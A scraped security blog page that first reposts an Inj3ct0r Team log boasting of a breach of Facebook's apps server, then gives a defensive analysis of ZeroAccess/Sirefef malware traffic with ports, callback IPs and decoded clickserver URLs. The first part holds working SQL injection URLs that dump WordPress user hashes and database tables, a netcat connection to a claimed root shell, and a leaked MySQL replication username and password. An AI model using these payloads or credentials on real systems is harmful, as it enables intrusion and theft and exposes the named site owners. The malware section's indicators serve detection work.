Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 164

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 167

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 170

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 173

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 176

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 178

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 180

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 202

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 206

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 224

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 225

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 227

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 56

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 49
Certified Ethical Hackers Security Analyst Malware Hacking Information | Security is an illusion | Page 3

====================================================

FaceBook's servers was hacked again by Inj3ct0r Team
====================================================
[+] English translation
    Inj3ct0r official website => Inj3ct0r.com
    Inj3ct0r community        => 0xr00t.com
                     __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___         
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\  
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \ 
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ 
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                          
               \/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\ \/\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
 \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
          [Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
   __             __      _    
 /'__`\         /'__`\  /' \   
/\ \/\ \  __  _/\ \/\ \/\_, \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ 
 \ \ \_\ \/>  </\ \ \_\ \ \ \ \
  \ \____//\_/\_\\ \____/  \ \_\
   \/___/ \//\/_/ \/___/    \/_/
        [Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...
Brevity the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
   __             __      ___    
 /'__`\         /'__`\  /'___`\  
/\ \/\ \  __  _/\ \/\ \/\_\ /\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
 \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
  \ \____//\_/\_\\ \____//\______/
   \/___/ \//\/_/ \/___/ \/_____/
              [0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
goOd =] Nice Hacking old school xD
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\_\L\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
           [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
   __             __   __ __     
 /'__`\         /'__`\/\ \\ \    
/\ \/\ \  __  _/\ \/\ \ \ \\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ 
 \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
  \ \____//\_/\_\\ \____/\/_/\_\_/
   \/___/ \//\/_/ \/___/    \/_/
             [Greetz]
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!
                       31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
                        Personally h4x0rz:
Sir Zaid (none)
You are good hackers. Respect y0u!
Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]

ZeroAccess/Sirefef (The same rootkit)  two common names for this malware. We have been observing ZeroAccess since 2010, but it was hardly a factor back then. Variants observed in 2012 have shown that it has completely shifted and now operates completely in user mode! It now resides completely in memory and trojans services.exe and other system processes (64bit and most 32bit infections).

In June, 2012 we saw a new publisher program launched and from information peaked from some of the darkest channels on EFNET top affiliates were earning as much as $300 per 1000 infections and pushing past the $10k/month mark. The updated version of ZA doesn’t use kernel-mode drivers, as was done previously, and doesn’t have hidden file storage either. The affiliate program substitutes its own choices for the results of popular search engines–a form of click fraud–as a means of monetization.

The ZA rootkit has a hardcoded list of 256 P2P IP addresses that it passes onto each infected host and transmits the data throughout the P2P network non-stop 24 hours a day at an average of a one second packet delay and fixed 16 byte packet length. We observed in our lab that each infected host was consuming .1 Mbits/sec which adds up to about 32Gigabytes a month per infection! There were several different UDP ports that were observed and confirmed for this pattern matching to ZA and those ports were 15437, 16461 ,16464,16465,16470 and 16471

If you capture thirty or so consecutive UDP packets sent out with a packet length of 16 to unique destination IPs to one of these ports (15437, 16461, 16464, 16465, 16470 or 16471) there is a high probability that ZeroAccess/Sirefef is running a muck on the system!

The variation in the ports used for the P2P network is for segregation of the botnets. Research suggest that ports 16470 and 16471 are for 64bit infected hosts and they participate in a bitcoin operations. 16464/16465 have mainly been seen used in click fraud and with 32bit machines.

-ZeroAccess does not use “typical” C2 servers, most of the C2 communication is done via UDP on the P2P network.through obfuscated commands. Hidden in the traffic we noticed time and again some of the same servers - 83.133.123.20 is one of the many IPs used which the infected host calls back to on port 53 UDP and port 123 to 195.3.145.57 also UDP.

Sirefef.EZ/Sirefef.EU and Sirefef.AE Variants have been observed using a special plugin feature to load affiliate clickservers.

The clickserver downloads a list of URLs to redirect the bots and the affiliates will be paid a percentage of the revenue earned or a flat rate ($.30 per infection). Clickservers can be used with many different malware infections making it hard sometimes to link them to any specific malware. We have observed these clickservers being loaded with ZeroAccess/Sirefef, ZeuS, Kelios and FakeAV malware.

Trying to decipher the source of the malware from just the GET request, here is an example of a ZeroAccess GET string from a clickserver:

/mfg437RPPwJxdj01LjUmaWQ9YjdjYzFmM2MmYWlkPTMwMzQ4JnNpZD01Jm9zPTUuMS0zMiZmcD0wJmFkPTE=45oIlHWm6w

We can decode this string and we get the following result:

[~]#  ™ø8ß´O?qv=5.5&id=b7cc1f3c&aid=30348&sid=5&os=5.1-32&fp=0&ad=1ã”u¦

Breaking it down we can see the following:

id=b7cc1f3c (Bot identifier?)

aid=30348 (Affiliate ID presumably)

sid=5 (Site ID, could be the Advertising site ID – we noticed the use of Voodoo and other Domain Parking Publishers being used or part of the click fraud which seemed to commonly lead back to the Google Domain Publisher program)

os=5.1-32 (Stands for Windows NT 5.1 which is Windows XP and the 32 is 32 bit OS)

Here you will see some clickserver links we pulled from traffic logs from different variants ZA/Sirefef infections over time:

http://217.23.9.139/CsxI66RhMCKfdj01LjUmaWQ9OWNhNTVjZmImYWlkPTMwNDIxJnNpZD0xJm9zPTUuMS0zMiZmcD0wJmFkPTE=54YIlc4z8m

ÌHë¤a0″Ÿv=5.5&id=9ca55cfb&aid=30421&sid=1&os=5.1-32&fp=0&ad=1ç

http://217.23.9.139/ihfe56JEKkfxdj01LjUmaWQ9MmQ3M2NmODcmYWlkPTMwNDIxJnNpZD0yJm9zPTUuMS0zMiZmcD0wJmFkPTE=14UvHcyz8w

ŠÞç¢D*Gñv=5.5&id=2d73cf87&aid=30421&sid=2&os=5.1-32&fp=0&ad=1×…/̳ó

http://217.23.9.139/2faW34Hhhw1Fdj01LjUmaWQ9MmQ3M2NmODcmYWlkPTMwNDIxJnNpZD0yJm9zPTUuMS0zMiZmcD0wJmFkPTE=45xYlu2c7S

Ev=5.5&id=2d73cf87&aid=30421&sid=2&os=5.1-32&fp=0&ad=1

http://217.23.9.139/Axfp58ZMMZCMdj01LjImaWQ9NzMyMTcwN2MmYWlkPTMwNDk0JnNpZD0wJm9zPTUuMS0zMiZmcD0wJmFkPTE=46ovfcvf5c

v=5.2&id=7321707c&aid=30494&sid=0&os=5.1-32&fp=0&ad=1

———————

 

Other known ZeroAccess/Sirefef callbacks and activities:

ZeroAccess.B/Sirefef.P – Last Seen: 8-17-12 (UDP/16471 Beacon)

HTTP requests…
URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=1&digits=10&siteId=31151618
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
DNS requests
promos.fling.com (208.91.207.10)
www.google.com (173.194.35.82)
TCP
208.91.207.10:80
213.108.252.185:80
68.97.87.253:16471
UDP
8.8.8.8:53
83.133.123.20:53
117.254.254.254:16471

ZeroAccess.P/SireFef.EW - Last Seen: 8-17-12 (UDP/16464 Beacon)

URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=1&digits=10&siteId=554
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=2&digits=10&siteId=675
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=3&digits=10&siteId=685
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://bigfatcounters.com/5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=4&digits=10&siteId=555
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
TCP connections…
208.91.207.10:80
213.108.252.185:80
99.230.4.251:16464
76.173.180.248:16464
UDP communications…
<MACHINE_DNS_SERVER>:53
8.8.8.8:53 (Google DNS)
194.50.116.54:53
66.85.130.234:53
ZeroAccess.FN/Sirefef.M - Last Seen 8-15-12 (UDP/16471 Beacon)
URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=1&digits=10&siteId=31236608
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=2&digits=10&siteId=31236729
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=3&digits=10&siteId=31236739
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=4&digits=10&siteId=31236609
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)

URL:  http://forever-counters.com/5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=5&digits=10&siteId=31236628
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
URL:  http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TYPE: GET
UA:   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)

URL:  http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
TYPE: GET
UA:   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)

URL:  http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_cab_ax_sgn.z
TYPE: GET
UA:   Flash Player Seed/3.0
DNS requests…
promos.fling.com (208.91.207.10)
www.google.com (173.194.39.20)
fpdownload.macromedia.com (2.18.34.70)
fpdownload2.macromedia.com (77.67.27.27)
TCP
208.91.207.10:80
213.108.252.185:80
67.184.54.251:16471
2.18.66.70:80
80.239.221.41:80
2.18.34.70:80
UDP
<MACHINE_DNS_SERVER>:53
8.8.8.8:53
83.133.123.20:53
67.184.54.251:16471
195.3.145.57:123

ZeroAccess.ER/Sirefef.P – Last Seen: 6-28-12 – (UDP/16471 Beaconing)

URL:  http://promos.fling.com/geo/txt/city.php
TYPE: GET
UA:   None

URL:  http://livecounter.co/count.php?id=31186432&c=1&d=7&s=0
TYPE: GET
UA:   Opera/9 (Windows NT 5.1; DE; x86)
DNS requests…
promos.fling.com (208.91.207.10)
www.google.com (173.194.69.99)
TCP connections…
208.91.207.10:80
184.172.204.122:80
69.244.121.249:16471
UDP communications…
<MACHINE_DNS_SERVER>:53
8.8.8.8:53
83.133.123.20:53
69.244.121.249:16471
195.3.145.57:123
117.254.254.254:16471
88.254.254.254:16471
75.254.254.254:16471
1.254.254.254:16471
197.253.254.254:16471
190.253.254.254:16471
94.253.254.254:16471
180.252.254.254:16471
95.252.254.254:16471
88.252.254.254:16471
79.251.254.254:16471
201.250.254.254:16471

ZAccess.CV Last Seen: 3-22-2012 - Infected host beaconing to port 16470

------

On August 13th, 2012 the students of two major East Coast, USA Universities were back in session and network admins were simply not prepared for what the students had brought onto their network. They reported that there were over 850 different student computers all beaconing at the same time allowing the Universities to participate in the ZeroAccess peer botnet. The total bandwidth reportedly consumed due to the ZeroAccess botnet at these two campuses within 24 hours was 1.59 Terabits!

——-

Tagged with:
 
Set your Twitter account name in your settings to use the TwitterBar Section.